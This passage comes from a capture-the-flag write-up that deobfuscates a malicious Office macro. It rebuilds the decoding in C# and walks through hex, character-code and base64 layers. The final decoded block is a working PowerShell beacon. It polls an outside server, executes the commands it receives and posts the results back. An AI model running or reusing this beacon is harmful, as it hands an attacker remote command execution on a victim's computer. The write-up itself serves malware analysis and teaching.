payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3131392036362031303720363520373120313037203635203938203130332036362031313020363520373020343820363520373920313033203635203534203635203730203835203635") + ConvertHexToCharacterCodes("203836203635203636"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("37312036352036382031303320363520373620313033203636203732203635203731") + ConvertHexToCharacterCodes("20383520363520313030203635203636203637203635203732203130372036352031303020363520363620313038203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3732203737203635203735203635203635203130372036352037312038352036352037352031313920363520313037203635203732203733203635203735203831203635") + ConvertHexToCharacterCodes("20313033203635203637203438"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("36352039372031303320363620") + ConvertHexToCharacterCodes("3131382036352037312031303720363520393820313033203635203130332036352036372039392036352037332036352036352031313020363520363720313037203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("313032") + ConvertHexToCharacterCodes("20383120363520313033203635203732203737203635203938203635203636203130382036352037312038352036352039392036352036352031303320363520363820363520363520373620313033"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363520353220363520373220343820363520383320363520363620") + ConvertHexToCharacterCodes("3835203635203639203733203635203130312031313920363520343920363520373220383520363520393920363520363520313232203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("373220373320363520383820313139203635203132322036352036382038312036352037382038") + ConvertHexToCharacterCodes("31203636203533203635203730203536203635203938203831203635203438203635203731203737203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("393920313033203635203131392036352036382038352036352031303220383120") + ConvertHexToCharacterCodes("3635203631"));

Console.WriteLine(DecodeBase64(payload1));

The above code should run in .NETFiddle with the “.NET 6” compiler selected.

One complication that I ran into was that in VBA, the chr() function converts a character code to it’s ANSI equivalent character, but modern C# running on a linux system does not like working with old Windows character sets like ANSI. Luckily, converting characters to ASCII worked in this case, because many of the characters are the same codes.

The numbers present in the code are first passwd to the uxdufnkjlialsyp function (which I’ve renamed to ConvertHexToCharacterCodes in my version of the code), which takes groups of two characters and parses them into their corresponding ANSI character. Decoding the fxnrfzsdxmcvranp variable in the code with this function gives us the following:

74 65 66 122 65 68 48 65 74 119 65 51 65 68 99 65 76 103 65 51 65 68 81 65 76 10365 120 65 68 107 65 79 65 65 117 65 68 85 65 77 103 65 54 65 68 103 65 77 65 65 5265 68 65 65 74 119 65 55 65 67 81 65 97 81 65 57 65 67 99 65 90 65 65 48 65 68 7765 89 103 66 106 65 71 77 65 78 103 66 107 65 67 48 65 77 65 65 48 65 68 77 65 90103 65 121 65 68 81 65 77 65 65 53 65 67 48 65 78 119 66 108 65 71 69 65 77 103 65122 65 71 69 65 77 103 66 106 65 67 99 65 79 119 65 107 65 72 65 65 80 81 65 110 6571 103 65 100 65 66 48 65 72 65 65 79 103 65 118 65 67 56 65 74 119 65 55 65 67 8165 100 103 65 57 65 69 107 65 98 103 66 50 65 71 56 65 97 119 66 108 65 67 48 65 85103 66 108 65 72 77 65 100 65 66 78 65 71 85 65 100 65 66 111 65 71 56 65 90 65 65103 65 67 48 65 86 81 66 122 65 71 85 65 81 103 66 104 65 72 77 65 97 81 66 106 6570 65 65 89 81 66 121 65 72 77 65 97 81 66 117 65 71 99 65 73 65 65 116 65 70 85 6599 103 66 112 65 67 65 65 74 65 66 119 65 67 81 65 99 119 65 118 65 71 81 65 78 6565 122 65 71 73 65 89 119 66 106 65 68 89 65 90 65 65 103 65 67 48 65 83 65 66 10865 71 69 65 90 65 66 108 65 72 73 65 99 119 65 103 65 69 65 65 101 119 65 105 65 6969 65 100 81 66 48 65 71 103 65 98 119 66 121 65 71 107 65 101 103 66 104 65 72 8165 97 81 66 118 65 71 52 65 73 103 65 57 65 67 81 65 97 81 66 57 65 68 115 65 100119 66 111 65 71 107 65 98 65 66 108 65 67 65 65 75 65 65 107 65 72 81 65 99 103 6649 65 71 85 65 75 81 66 55 65 67 81 65 89 119 65 57 65 67 103 65 83 81 66 117 65 7289 65 98 119 66 114 65 71 85 65 76 81 66 83 65 71 85 65 99 119 66 48 65 69 48 65 9081 66 48 65 71 103 65 98 119 66 107 65 67 65 65 76 81 66 86 65 72 77 65 90 81 66 6765 71 69 65 99 119 66 112 65 71 77 65 85 65 66 104 65 72 73 65 99 119 66 112 65 7152 65 90 119 65 103 65 67 48 65 86 81 66 121 65 71 107 65 73 65 65 107 65 72 65 6574 65 66 122 65 67 56 65 77 65 65 48 65 68 77 65 90 103 65 121 65 68 81 65 77 65 6553 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 65 71 85 65 99 103 66 122 65 6765 65 81 65 66 55 65 67 73 65 81 81 66 49 65 72 81 65 97 65 66 118 65 72 73 65 9781 66 54 65 71 69 65 100 65 66 112 65 71 56 65 98 103 65 105 65 68 48 65 74 65 66112 65 72 48 65 75 81 65 55 65 71 107 65 90 103 65 103 65 67 103 65 74 65 66 106 6567 65 65 76 81 66 117 65 71 85 65 73 65 65 110 65 69 52 65 98 119 66 117 65 71 8565 74 119 65 112 65 67 65 65 101 119 65 107 65 72 73 65 80 81 66 112 65 71 85 65 10165 65 103 65 67 81 65 89 119 65 103 65 67 48 65 82 81 66 121 65 72 73 65 98 119 66121 65 69 69 65 89 119 66 48 65 71 107 65 98 119 66 117 65 67 65 65 85 119 66 48 6571 56 65 99 65 65 103 65 67 48 65 82 81 66 121 65 72 73 65 98 119 66 121 65 70 8965 89 81 66 121 65 71 107 65 89 81 66 105 65 71 119 65 90 81 65 103 65 71 85 65 79119 65 107 65 72 73 65 80 81 66 80 65 72 85 65 100 65 65 116 65 70 77 65 100 65 66121 65 71 107 65 98 103 66 110 65 67 65 65 76 81 66 74 65 71 52 65 99 65 66 49 6572 81 65 84 119 66 105 65 71 111 65 90 81 66 106 65 72 81 65 73 65 65 107 65 72 7365 79 119 65 107 65 72 81 65 80 81 66 74 65 71 52 65 100 103 66 118 65 71 115 65 9081 65 116 65 70 73 65 90 81 66 122 65 72 81 65 84 81 66 108 65 72 81 65 97 65 66 11865 71 81 65 73 65 65 116 65 70 85 65 99 103 66 112 65 67 65 65 74 65 66 119 65 6781 65 99 119 65 118 65 68 99 65 90 81 66 104 65 68 73 65 77 119 66 104 65 68 73 6589 119 65 103 65 67 48 65 84 81 66 108 65 72 81 65 97 65 66 118 65 71 81 65 73 6566 81 65 69 56 65 85 119 66 85 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 6571 85 65 99 103 66 122 65 67 65 65 81 65 66 55 65 67 73 65 81 81 66 49 65 72 81 6597 65 66 118 65 72 73 65 97 81 66 54 65 71 69 65 100 65 66 112 65 71 56 65 98 10365 105 65 68 48 65 74 65 66 112 65 72 48 65 73 65 65 116 65 69 73 65 98 119 66 10765 72 107 65 73 65 65 111 65 70 115 65 85 119 66 53 65 72 77 65 100 65 66 108 65 7148 65 76 103 66 85 65 71 85 65 101 65 66 48 65 67 52 65 82 81 66 117 65 71 77 65 98119 66 107 65 71 107 65 98 103 66 110 65 70 48 65 79 103 65 54 65 70 85 65 86 65 6671 65 68 103 65 76 103 66 72 65 71 85 65 100 65 66 67 65 72 107 65 100 65 66 108 6572 77 65 75 65 65 107 65 71 85 65 75 119 65 107 65 72 73 65 75 81 65 103 65 67 4865 97 103 66 118 65 71 107 65 98 103 65 103 65 67 99 65 73 65 65 110 65 67 107 65102 81 65 103 65 72 77 65 98 65 66 108 65 71 85 65 99 65 65 103 65 68 65 65 76 10365 52 65 72 48 65 83 65 66 85 65 69 73 65 101 119 65 49 65 72 85 65 99 65 65 122 6572 73 65 88 119 65 122 65 68 81 65 78 81 66 53 65 70 56 65 98 81 65 48 65 71 77 6599 103 65 119 65 68 85 65 102 81 65 61

It appears that the decoded ANSI characters are themselves a list of character codes. In the VBA code, these codes are passed on to a second function - wdysllqkgsbzs (which I have renamed ConvertCharacterCodesToStrings in my version of the code.)

These second-level character codes are already delimited by spaces, so we can more easily split them into an array and translate them to ANSI/ASCII. Doing so gives us the following:

JABzAD0AJwA3ADcALgA3ADQALgAxADkAOAAuADUAMgA6ADgAMAA4ADAAJwA7ACQAaQA9ACcAZAA0ADMAYgBjAGMANgBkAC0AMAA0ADMAZgAyADQAMAA5AC0ANwBlAGEAMgAzAGEAMgBjACcAOwAkAHAAPQAnAGgAdAB0AHAAOgAvAC8AJwA7ACQAdgA9AEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJABwACQAcwAvAGQANAAzAGIAYwBjADYAZAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAEEAdQB0AGgAbwByAGkAegBhAHQAaQBvAG4AIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMAA0ADMAZgAyADQAMAA5ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AKQA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAJABwACQAcwAvADcAZQBhADIAMwBhADIAYwAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AIAAtAEIAbwBkAHkAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGUAKwAkAHIAKQAgAC0AagBvAGkAbgAgACcAIAAnACkAfQAgAHMAbABlAGUAcAAgADAALgA4AH0ASABUAEIAewA1AHUAcAAzAHIAXwAzADQANQB5AF8AbQA0AGMAcgAwADUAfQA=

This looks an awful lot like base64. In my c# version of the code, I included a DecodeBase64 function to decode this into plaintext - the original code did not include this, because it passed the base64 directly to powershell with the -enc parameter. A person could also simply copy and paste this into a tool like CyberChef.

Decoding the base64, we get the following block of powershell code. There may be extra “null” bytes between the characters, and some base64 tools may or may not automatically remove these - in CyberChef, one can simply add the “Remove null bytes” operation to clean it up.

$s='77.74.198.52:8080';$i='d43bcc6d-043f2409-7ea23a2c';$p='http://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/d43bcc6d -Headers @{"Authorization"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/043f2409 -Headers @{"Authorization"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/7ea23a2c -Method POST -Headers @{"Authorization"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}HTB{5up3r_345y_m4cr05}

This blob of powershell looks a bit scary, but we’ve found our flag, so that’s the end of this challenge.

HTB{5up3r_345y_m4cr05}

Takeaways

• Be suspicious of macro-enabled documents.
• Better yet, deny the use of macro-enabled documents on your network and assume they are malicious, because in 2022 if you are making a macro-enabled document, there is almost certainly a better and safer way to do things.